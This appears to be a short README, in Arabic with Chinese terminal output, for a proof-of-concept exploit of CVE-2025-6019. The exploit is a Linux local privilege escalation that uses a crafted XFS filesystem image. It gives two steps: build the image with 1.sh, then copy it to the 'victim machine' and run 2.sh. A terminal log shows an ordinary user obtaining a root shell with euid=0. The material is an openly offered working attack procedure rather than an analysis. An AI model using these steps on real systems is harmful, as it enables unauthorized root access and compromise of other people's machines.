
استغلال ثغرة رفع الامتيازات المحلية لـ CVE-2025-6019 باستخدام صور نظام ملفات XFS مصمَّمة خصيصًا للحصول على وصول شل الجذر على أنظمة لينكس.
الخطوة الأولى: تشغيل 1.sh على جهاز Linux لبناء xfs.image.
الخطوة الثانية: نقل xfs.image إلى الجهاز الضحية وتنفيذ 2.sh، ويكون النجاح كما يلي:
neko@aosc-neko205 [ tmp ] $ bash 2.sh
当前用户: neko
uid=1000(neko) gid=1001(neko) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
('yes',)
Mapped file /home/neko/xfs.image as /dev/loop0.
成功找到 Root Shell: /tmp/blockdev.IK6D92/root-shell
正在提权...
root-shell-5.2# id
uid=1000(neko) gid=1001(neko) euid=0(root) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
root-shell-5.2#